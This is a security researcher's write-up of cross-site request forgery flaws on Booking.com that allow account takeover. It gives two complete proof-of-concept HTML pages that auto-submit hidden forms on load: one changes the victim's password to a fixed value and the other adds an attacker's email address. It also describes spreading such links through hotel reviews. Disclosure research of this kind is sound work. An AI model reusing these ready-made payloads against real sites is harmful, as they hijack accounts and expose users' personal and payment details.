Booking.com Account Take-Over CSRF Vulnerability

Hello i'm Mohamed M.Fouad an Independent Security Researcher from Egypt. I have been got acknowledgement from many of the Firms like as Microsoft,Oracle,Yahoo,eBay,Sony,AT&T,Huawui,DropCam, Bitcasa, Get Pocket, Splitwise and so many...

================================================

CAUTION

THIS IS FOR LEARNING PURPOSE AND FOR ETHICAL USE ONLY...

Booking.com is an online booking website established in 

1996, based in Amsterdam, Netherlands and since 2005 

owned and operated by United States based Price-line.

Booking.com offers online accommodation booking.

Hello Guys!

Today i will show you how I discovered a lot of critical security vulnerabilities at (Booking.com) it can lead to very harmful impact on all users by force users change thier passwords , add alternative emails or change anything in their profile settings but these vulnerabilities can be escalated to deface all the site by posting malicious urls in Hotels reviews comments and all users change their accounts passwords.

One week or more ago when i found that TripAdvisor Hacked and Database Breached so i decided to check most travel giant website Booking.com that used by all people over all the world so when i checked it i discovered that all booking.com vulnerable to CSRF Attack which can lead to account hijacking via change victim password with csrf attack

impact was you can change any details in user account settings and this is the most critical point in this article so you can change user password ,add another mails or credit cards etc.. , or mark victim's account to delete it ,this can be done via just one-click ,malicious URL

This can be done via add review (comment) if an attacker post his/her rate review on a place with malicious URL attacker can change victim account password but the problem here no one can add review on a Hotel until they invite you (by email) to write a review after you have booked through them and stayed at the hotel. so this part i didn't try it because i lost all mail that i have got from them before.This way attacker can deface all the site , i sent them but i didn't get reply yet.

Note: You will see here each request to do something in booking.com depends on "op" Parameter with action name value (ex:changepw,add_email,delete_account) without token exists.Booking.com have a lot if vulnerabilities but the most critical one you can change user password via CSRF Attack.

  Below is the Critical one !!!!

 =============================

  Change Password CSRF Request :

==============================

<html> 

<body onload="document.csrf.submit()">

<formaction="https://secure.booking.com/login.en-us.html?aid=304142;sid=84a359da3688960a9a914a5198ce9929;dcid=2;tmpl=profile/myaccount" 

method="post" name="csrf" ">

<input type="hidden" name="op" value="changepw"><br>

<input type="hidden" name="lang" value="en-us"><br>

<input type="hidden" name="username" value=""><br>

<input type="hidden" name="reset_hash" value=""><br>

<input type="hidden" name="error_url" value=""><br>

<input type="hidden" name="password" value="hacked@2014"><br>

<input type="hidden" name="password_confirm" value="hacked@2014"><br>

</form>

</body>

</html>

 ==============================

  Add Email CSRF Request :

================================

<html> 

<body onload="document.csrf.submit()">

<formaction="https://secure.booking.com/login.en-us.html?aid=304142;sid=84a359da3688960a9a914a5198ce9929;dcid=2;tmpl=profile/myaccount" 

method="post" name="csrf">

<input type="hidden" name="op" value="add_email"><br>

<input type="hidden" name="email" value="hacker@hotmail.com"><br>

<input type="hidden" name="lang" value="en-us"><br>

</form>

</body>

</html>

Hope you find it interesting and HAVE FUN with POC Video :)

Regards,

CAUTION

THIS IS FOR LEARNING PURPOSE AND FOR ETHICAL USE ONLY...